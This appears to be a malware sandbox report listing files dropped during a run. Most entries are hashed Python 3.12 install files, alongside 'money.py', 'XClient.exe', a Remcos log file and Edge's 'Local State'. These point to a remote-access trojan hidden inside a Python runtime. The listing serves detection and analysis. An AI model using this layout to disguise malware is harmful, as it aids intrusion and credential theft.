SHA1 9671e2ef6e3d9fa96e7450bcee03300f8d395533
SHA256 b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216
SHA512 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file

MD5 37b59afd592725f9305e484a5d7f5168
SHA1 a02a05b025b928c039cf1ae7e8ee04e7c190c0db
SHA256 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8
SHA512 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_pydoc\__init__.py

MD5 4a7dba3770fec2986287b3c790e6ae46
SHA1 8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0
SHA256 88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d
SHA512 4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210

C:\Users\Admin\Downloads\Python\Python312\Scripts\pip3.12.exe

MD5 ece8006a0714b569546a3f789638a55a
SHA1 520ba56fd30bcf1e08eefb390d392905c3470936
SHA256 e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b
SHA512 bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c

C:\Users\Admin\Downloads\Python\Python312\python.exe

MD5 3d44212bba2d7a88d6c83ce8523bba88
SHA1 62ea5374c17b0f2f88f7d4a6c03b592393dba6f8
SHA256 15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a
SHA512 89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

C:\Users\Admin\Downloads\Python\Python312\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\Downloads\Python\Python312\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\Downloads\Python\Python312\money.py

MD5 4522647e7e5989f38a2447eded414c0e
SHA1 3c36233e769420742a23a371a5e65278949a7295
SHA256 846bc3c9676ff8e721189a34fbc31bdc7270d242d3dfe3943565bcecdb6c2519
SHA512 ebf10bb9d09624e99eb9108741a1554cbc4d8fde84a4479d9006b2fc971a6c96c3ed96ec059501f3fb472e51c977bb77571a8ddd51e46df9f70057a3fe5f9155

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

MD5 d42473ce94dd1209f1a2b65e7cc79d8f
SHA1 56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc
SHA256 d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db
SHA512 a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc

MD5 bb08f420f5dfd2344aa42e77cd36669c
SHA1 5e6f66233b1a85bfb8fa1812b8f3b1f63e68151c
SHA256 23440df45b19d66e0d6177162bb06eb02415cdb8b7ff3acc5bf8b17fd463b1f1
SHA512 c2811310838e4ba03211117bb06e8434633365959f9e29888450fcaff1d9de0349b65d91f7e3a6603ce9bcaf79e88f5b48e5c557575fda61e4569c8953c9c34a

C:\Users\Admin\Downloads\Python\Python312\Lib\enum.py

MD5 3a87f9629edad420beb85ab0a1c4482a
SHA1 30c4c3e70e45128c2c83c290e9e5f63bcfa18961
SHA256 9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a
SHA512 e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a

C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\__init__.cpython-312.pyc

MD5 dd2891a001b7a253aec124836d20a4b5
SHA1 91f34a7b0204aae4aacef46bb8ce8add60421d3d
SHA256 e71aac7c0a44cf181682c8887ab2139e5d894f94edde24085a26feecbefb77c9
SHA512 d88dc7450eec5742b9d21f95062cf04ebbf3712d6e20acd4eabafa3cc176d04980f92574a69f32dccbea0454e509660ac4f90e5e49becb54c4c0cd2ee3da2051

C:\Users\Admin\Downloads\Python\Python312\Lib\re\__init__.py

MD5 02f3e3eb14f899eb53a5955e370c839f
SHA1 e5c3ab0720b80a201f86500ccdc61811ab34c741
SHA256 778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42
SHA512 839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\base64.cpython-312.pyc

MD5 6a425637cb61c65ae8cfe0d83e6e3b77
SHA1 d7615d5216ab6d69fbff349bf7e12fe5aa45c741
SHA256 575e9d22cf5e94a7c15044c45bd8f7c03fce5b8b92336651d57ea5e20da188f4
SHA512 84ca7a4f05bc5fbef41fde057dc10a6cc252c4a371b28657085766638a04beacff22c2ac1588d7b077cac6eebe5bfc7c8aadf4ce4f8468282c2a336f7b8d3e27

C:\Users\Admin\Downloads\Python\Python312\Lib\base64.py

MD5 231ae490d92466b1573e541649772154
SHA1 4e47769f5a3239f17af2ce1d9a93c411c195a932
SHA256 9e685425290c771df1a277b5c7787ad5d4cf0312f2c4b042ce44756df6a3d112
SHA512 7084b49f0788bfbe035bc2fe42db7a63b21ebc99f63c03f80dec5569067c1e63312d8c5a754f2d72d7c9bb51fa23ca479fcba78682610eb2b68870cbeae1bea3

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\_endian.cpython-312.pyc

MD5 0fda9dc9c51560c5455ddc99b95dcfe8
SHA1 46794653086d98b8d64eee575e7a04689beea63a
SHA256 4bed1c75e896df05229e609fd827d94a5382e92b158595141b487a70600d5c35
SHA512 7c110f406deafad91d00468d23c38cc0e76a189ded1e8d9491dc3692fbeb5887cad20ee10a0a97b989fdd67529b2fb8b5ad4e183d535dab1d0f1f254503c83c7

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\_endian.py

MD5 7daa213263c75057cf125267b7fdfbd3
SHA1 efb9403d8e3f09734f6b2ba3889b274997d0a039
SHA256 8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579
SHA512 1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\struct.cpython-312.pyc

MD5 29ae69bad548bcb4adc79ed4bd7f073d
SHA1 4ce183af84f7cb3c428ef87d97c03c871417026d
SHA256 038ef897ce5864486e09285946d54c459421b7d10253565c1e2a13857d78b6a9
SHA512 fb90f1ddddadd634af51d8af4d0cd0a8b5011c754d068410bc723c3f6a442f8bdf8105d69f4f77539c5ffb8c446ece7dbcd84a2f40483d3b7f54fe4e76fb3e08

C:\Users\Admin\Downloads\Python\Python312\Lib\struct.py

MD5 5b6fab07ba094054e76c7926315c12db
SHA1 74c5b714160559e571a11ea74feb520b38231bc9
SHA256 eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945
SHA512 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

C:\Users\Admin\Downloads\Python\Python312\DLLs\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\Downloads\Python\Python312\DLLs\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\Downloads\Python\Python312\python3.dll

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\types.cpython-312.pyc

MD5 c5d38a269d5b92e2bfde072a30c45e33
SHA1 23a0d92d7c87656b952439d7c8bba43049bd535e
SHA256 83437236d1d5c63d0e5ab989e104cd3bbce11ea2b3509bded6bac3376a360f5b
SHA512 7ff7179e86f9581d1f71459ca1c6959e0e9cfda2840f26df13f84fab36b823ca10fd5c3966209021348e723269f22afcc69cb089230c86ec5d2d6ae5c10cd505

C:\Users\Admin\Downloads\Python\Python312\Lib\types.py

MD5 8303d9715c8089a5633f874f714643a7
SHA1 cdb53427ca74d3682a666b83f883b832b2c9c9f4
SHA256 d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e
SHA512 1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\__init__.cpython-312.pyc

MD5 e2b942b6814a6d1cad2e720a7b7c1bc6
SHA1 b1af27740ba54ff33ad8a788e0bea405e4053e7b
SHA256 2eb5ccbed547f4cb54bd86d1bbdd8a91bdb9f4d7758b09279ba6bca889ef4d5c
SHA512 5a0248bf8670f28d5c727d33e7d1857c91413a86e3420676c0e35d342252bd638485d25cc7c9e1f42a0cf18330c842f5a5efeb6bc8f1923620b52a99868215c8

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__init__.py

MD5 d0859d693b9465bd1ff48dfe865833a3
SHA1 978c0511ef96d959e0e897d243752bc3a33ba17c
SHA256 bb22c1bd20afd47d33fa6958d8d3e55bea7a1034da8ef2d5f5c0bff1225832c0
SHA512 093026a7978122808554add8c53a2ead737caf125a102b8f66b36e5fd677e4dc31a93025511fcf9d0533ad2491d2753f792b3517b4db0cfe0206e58a6d0e646c

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py

MD5 52084150c6d8fc16c8956388cdbe0868
SHA1 368f060285ea704a9dc552f2fc88f7338e8017f2
SHA256 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519
SHA512 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\utf_8.cpython-312.pyc

MD5 6f9bafab786fdd627c247fbe8e85de01
SHA1 ce99d8bfaa08e52be5dece42c851684458116988
SHA256 a225709104aa9d764c01de396add10bbcfb96a7ae019af69d8de81a683b1f245
SHA512 f53cce6e51e00cb120213810f74016fee82a62be4ed7b5fcdfaefa5f03eaca2e9fc01ad0b7e24860f82d8f2c34fd967e62aeeb04b6a59fe10553c36c96cc79b9

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\utf_8.py

MD5 f932d95afcaea5fdc12e72d25565f948
SHA1 2685d94ba1536b7870b7172c06fe72cf749b4d29
SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
SHA512 a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\aliases.cpython-312.pyc

MD5 1f1314b9020e3c6fe612e34124f9f2b0
SHA1 058c5eb8ff54f49905a5579ccdfccb38de087e97
SHA256 9c262190210f884f24e4d227cb6e4e9706b2909ff4ab18917bb9c86da0ddde26
SHA512 f1db57c6456def9001201e5db14523ab2cd97c6aba200699aff11a6e8d352009f072281fdec93cd764c4083778efeab2e34e1b0240b0938c4e0b10763b21bf76

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\aliases.py

MD5 ff23f6bb45e7b769787b0619b27bc245
SHA1 60172e8c464711cf890bc8a4feccff35aa3de17a
SHA256 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8
SHA512 ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\__init__.cpython-312.pyc

MD5 5793df77b697f1109fe6473952792aca
SHA1 99d036fd2a4e438bfb89c5cf9fab62292d04d924
SHA256 6625882aff1d20e1101d79a6624c16d248a9f5bd0c986296061a1177413c36f3
SHA512 809eb8fc67657cc7e4635c27921fffa1d028424724542ef8272a2028f17259c11310e6e4ddfe8c4b2c795e536a40300ec6d6b282b126de90698716cde944e5ad

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__init__.py

MD5 ea0e0d20c2c06613fd5a23df78109cba
SHA1 b0cb1bedacdb494271ac726caf521ad1c3709257
SHA256 8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74
SHA512 d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3

memory/3852-11560-0x00000273492A0000-0x00000273492AF000-memory.dmp

memory/3852-11562-0x000002734AE20000-0x000002734AE30000-memory.dmp

memory/2732-11564-0x0000022F4EED0000-0x0000022F4EEE0000-memory.dmp

memory/2732-11566-0x0000022F50A60000-0x0000022F50A70000-memory.dmp

memory/4772-11568-0x000001E932440000-0x000001E932452000-memory.dmp

memory/4772-11570-0x000001E933FE0000-0x000001E933FF2000-memory.dmp

memory/2324-11576-0x000002419FEF0000-0x000002419FF07000-memory.dmp

memory/2324-11578-0x00000241A1BB0000-0x00000241A1BC6000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 fb95de2db64beb631e865e2edb7e93e6
SHA1 80d9c8bb7c930b75948d70b46fb99aa8129b65f3
SHA256 a0a21df8603efafa3ee50e318b9fb2790eef1f66a2391b35f754c899e2f1a979
SHA512 ad14dd14921dc589e6bb2447f5967c307e169eafc9e0a91a71124beb8011795a25554418724448696e216a91b6da5b17776667c2f6c10163de5a1c10b80e24a5

memory/3580-11584-0x000001C617E20000-0x000001C617E36000-memory.dmp

memory/3580-11586-0x000001C6199C0000-0x000001C6199D6000-memory.dmp

memory/4928-11588-0x0000029DC7D70000-0x0000029DC7DE4000-memory.dmp

memory/4928-11589-0x0000029DC9A10000-0x0000029DC9A84000-memory.dmp

memory/4928-11591-0x0000029DC9AE0000-0x0000029DC9BBC000-memory.dmp

memory/4928-11601-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11639-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11650-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11648-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11646-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11643-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11637-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11636-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11633-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11631-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11629-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11627-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11625-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11623-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11619-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11617-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11615-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11613-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11611-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11609-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11607-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11605-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11604-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11599-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11597-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11595-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11593-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11592-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11641-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11621-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/3440-14945-0x0000017328A80000-0x0000017328A8E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 962061d3e62667a4c08c557104c93f68
SHA1 5b0093cbcd97a17f8d4dcb8788b2fe1649acc86a
SHA256 b66b05be70ca655b4e0e9ef7c9a1b61a97aebeb62e25116151f41c425b10efca
SHA512 992f09ae89df8d018d3b867d37f0da2b414f7f60f570f82774172abd7423ff703c679fc409a638f502084e32de246dc7f5beffdac649e62805204502da3bb3ba

memory/4152-17938-0x0000026A76D30000-0x0000026A76F1C000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 26ee862af49472997e7159e4c02c80a7
SHA1 5d8888350069f55fa3268cf59261c79bec85b56c
SHA256 5af17b6806654ffd9ffa0853de31d9dc96617216e21f226004702f2ffaf4a425
SHA512 51da49201ff92cf75fc65f5c9ec56ea29d38d16fd2db2185e10f3cd7aef3d63472cbd62b61fc8edef9826c901777177919ba6485205733e219e5fbba85b61fd4

C:\Users\Admin\Downloads\Print\Python312\Doc\html\NEWS

MD5 3a2f081757c87fe3f9745f2e857755fa
SHA1 0d49e71b9e0ffaa4f4dc8dcb45a95baa664038e7
SHA256 a15b65d338884ef6b8b99ea300405a293dfec362610e79b8d19755112624210e
SHA512 21f9968546c590d9f8a87333345f6086725905ba2724e5ca5f8f8e1165c20703906fda8e1d0bf59517abe8b166b80f47380e70bb535713a1e7e313b673f21fbd

C:\Users\Admin\Downloads\Print\Python312\Lib\__phello__\__init__.py

MD5 d577c4cfec75304f5f339da0e128db83
SHA1 9542419ca9315d30602f4fe9c9c95d0a2f72bc4f
SHA256 b9ba5f17a049779747dbc8b17fa318fab67875be829994ed437c81d0666a88dc
SHA512 84720ac8d037b6fd51b08f63019f17f1b212069d3bf53c18fecaff4c8fac0c6bce4f73617a7c63fa9a8fd2ba32ba56c11c0a88484aa5e113f33ca768d6ef7bfe

C:\Users\Admin\Downloads\Print\Python312\Lib\concurrent\__init__.py

MD5 f8259102dfc36d919a899cdb8fde48ce
SHA1 4510c766809835dab814c25c2223009eb33e633a
SHA256 52069aeefb58dad898781d8bde183ffda18faae11f17ace8ce83368cab863fb1
SHA512 a77c8a67c95d49e353f903e3bd394e343c0dfa633dcffbfd7c1b34d5e1bdfb9a372ece71360812e44c5c5badfa0fc81387a6f65f96616d6307083c2b3bb0213f

C:\Users\Admin\Downloads\Print\Python312\Lib\lib2to3\fixes\__init__.py

MD5 3d02598f327c3159a8be45fd28daac9b
SHA1 78bd4ccb31f7984b68a96a9f2d0d78c27857b091
SHA256 b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214
SHA512 c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903

C:\Users\Admin\Downloads\Print\Python312\Lib\site-packages\pip-24.0.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\Downloads\Print\Python312\Lib\test\audiotest.au

MD5 2d3d86aedec6b204f70cee1e483d3e14
SHA1 0bb29f5835dbf25b09e98271205a5b0e3b499ac3
SHA256 bb24009573f88b990c922fdc65adddec1312e30373dc635c6099912d4f836a41
SHA512 4981b870b89ab02309d9b5a4acdadd1f145baaacb5f23d0575ba2c62f10bbfe2343c1178456270ad5d9f22f9528e846928d014c14146ec100b8bfeb07cb3f29a

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\4e1295a3.0

MD5 73e784827cc9c81f8ca3fbd372984afd
SHA1 d1553f1e3c103bb429e3af0c2211414fc1d16d4b
SHA256 11772d99be4b8d343c1299eb2f332f0612c290643543708d860bf81c25cfb5c9
SHA512 f8a52854ccdbe535be524aa67a9ba7d793244ba431b2a73cd39b8e5fb925fb09347bdd5333716e44a02e2b814d0f15156992ecc0a1bbb1c89c6e1d5ec18990b3

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\5ed36f99.0

MD5 3fe5f823824bedd9fe3176e58db69fa4
SHA1 807cc9ffa5fe60115bf9df8a086f5cb1199b0a19
SHA256 9c6a82a2d3c4c374fcc2e78d3eda445ebce74d3a7a4d84fc447739df91cb1f0c
SHA512 03f0684a8ad2545add75637562655dfa3c89d06159d607df6e2efac2c446a95bd9cb0437f1c195a75b2e438d7e7812f4f85fbf136e45402947298a1e3fb3506a

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\b1930218.0

MD5 6688a112dc263017affbadeb4b4e4fb4
SHA1 4567ed723977e15d26da815c51046db208c068a0
SHA256 5d35cb81810204013d7fffeb0d01092f9243f994aabfebd017a1d3c217b15693
SHA512 90e5f78f3cd4a0c97331cf66eb4a94115f3cad878eb351d05bc6a8f38dfd8bf18b9a62d5b953d3d4fc36f240db85656e5070bea807967961c365f5ff4ccd6a82

C:\Users\Admin\Downloads\Print\Python312\Lib\test\cjkencodings\cp949-utf8.txt

MD5 4ad57dc71cd0710481e757484c6d1197
SHA1 44cffb5117f62e0697f27f9d2537de3108749df4
SHA256 175e984c0c7bd073f037b0aaa6df4d8aadacb6f1b8898484a567b5e70f5a5837
SHA512 4a2f934f6f907cd2b3c70e3614684460f253e29ce554a418cdc53555feb26252607283d4d5c27221cc8205d002febf4c73b49d5ac0c6b7376e5dade72e9fc9ee

C:\Users\Admin\Downloads\Print\Python312\Lib\test\cjkencodings\euc_jisx0213-utf8.txt

MD5 856e0cebae566258f572e27aedcbf34d
SHA1 9c4e3bafcc4a0c146d4bf21dd126484bb454e789
SHA256 21cb011018b58c87f2c824e08085d24f9379244bcde6fbb6b46da2f6431540c7
SHA512 21e996c6470367d7a74e6cf96b0105ddd93fda0c20fa4053842c3504f582c83688caf04fb64f7fa0e28378d894d29a7b1a39b8bfa7869f710fcc804a6231b3b8

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.bmp

MD5 e3a1f317b1a275e5d5f1b4b0ff04ee01
SHA1 8f37f2c3b3c5b5fd2da41ddcc59ad1b6c29b9bf0
SHA256 410c26b109ce9d32d35c0e4bc6dc92a7579910ce706939a056323de5801a7a87
SHA512 31e83c2bdbd86b038ba0e8ebf02947ddaef002033c760e16ea868c7a673257686d89e328017cbbc8915d31f62fb5149aa0569437525dff8325dd4a8499d718b7

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.exr

MD5 30ffa52a5a358b289c249e1e2d2fa666
SHA1 d07051ed146c1910dbe5d0de8a08d86031390edb
SHA256 abcfa16526dd3d1f31954f88813928de507f4bf2911f30d08ff756d8b46baee5
SHA512 9ffbef0197305e9f1df486af25b743ae0ae5cdc7e198ce8bd45f62e87acbbc4c431fd9944f7dd04103461df392a22c1df43a0e49644adeff2822c1e43b71a43c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.gif

MD5 bb6db723ceadf8ce03d5ad234f9d7273
SHA1 46537a3e2b3764d35e4bff0c951fa87adc17fb83
SHA256 4fce1d82a5a062eaff3ba90478641f671ce5da6f6ba7bdf49029df9eefca2f87
SHA512 bd07b17fb373bea74b9af28e504c6d66c897978e071404e7d04a7bc1a0843e0d7ca5689fc7215e15a9721757889bc75ed920ca72f17810922ae99d62c65c831c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.jpg

MD5 50e9104383c3f36fa9e9be6148e6fdf3
SHA1 9b19331a00f83f12fdc2feba2eb401f9732f8d44
SHA256 0171178ae901e108f56305aff7e36268a690bc49933a24b1aaa587fda00f4d3b
SHA512 c6c940a0e60c1d5c75398592f61da3c874e3bc2b5b7ff328d83de8c8352a4e1e3959954e67049a5c3d6a609af97e39d0e0d16b5a4463328bbc436b8e2926e5d0

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.pbm

MD5 4128214992ffcd16a57fd47c73558b58
SHA1 d8a65c33c1df14930651e1b34b9349b6b179205a
SHA256 7151dc8ebdca81804c959266b14122bf74e62cab773dd8e2f37b379aac105266
SHA512 1c2a56f82742d9f0d8976183ca130454d6e472524a12eb38c4106eaa5bffdb3bf7de3eb31908fea096fb6017c87dd82097bbbd1b17c0ae484ee52a0e192b9590

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.pgm

MD5 18ceaa0a28ec83628b429486f6a6a437
SHA1 1c1c30720dd823863542845395c5a4699a19a060
SHA256 3c27b4cdc7089ddb410ddb81a5ccf42662972e07dfc44fc429d3056af6dd128e
SHA512 1e904378aa240af975fd6ce75b7bf8366105972f257457d317f1ea2e40cab7d1d52ddd95e9d020f50ee5ab298b3b6a0f73f43270155b33ad5bed6d358bac9262

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.png

MD5 91f80d44b0a786e5b0b3049ad61159fa
SHA1 e2fa9ade66052b6c706dec73bae2b44969232ad6
SHA256 480ac039362a15a7738ba76dffe807fd03fa29f7edaa8eb21ca0057c44a1ee8c
SHA512 c73fc0baebc8974e4ad152c81a784aa8ac434d387040c19d75d1cb9e8417e89b6af07b01b88004f9ced6c1feaf8994a04ee926769ee01757932f25b0a834ac30

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.ppm

MD5 a2b32811bb48fbf84e6a4ffa90b6a81c
SHA1 df8515c83469e5f728331f20eb6264953fbc40c7
SHA256 a7f21a2c5226b7d35ccac23780ae535921353b54bf7d7e61f1ad9b021167ba6c
SHA512 a49d7738997b62be088a09cdcf86d9e1fa12dd531c1a880eb519664daf87be581777843a02f15b35d731d1e0f58077ee5630235c71e2a11cebeb337b6528e0a9

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.ras

MD5 8c0f739219341ffae245b5ae0a63710f
SHA1 ee63733bbfac51ed6c2ed2dab2a250faf25f36af
SHA256 10e37c432b4b93a7d257fbb890636fa7f6f376321cca47d5919ea5b6adc75d38
SHA512 5c4db61b091375d87001a600c282285f0e66fcdd4e99c5bbe03a8e7ec0b898abae777454491e7d9f9da5fe9bd56b6e5d5d5e0c8e142f629780fb3a399b3f4add

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.sgi

MD5 11e019f5073be9f31a95f34929fec4e2
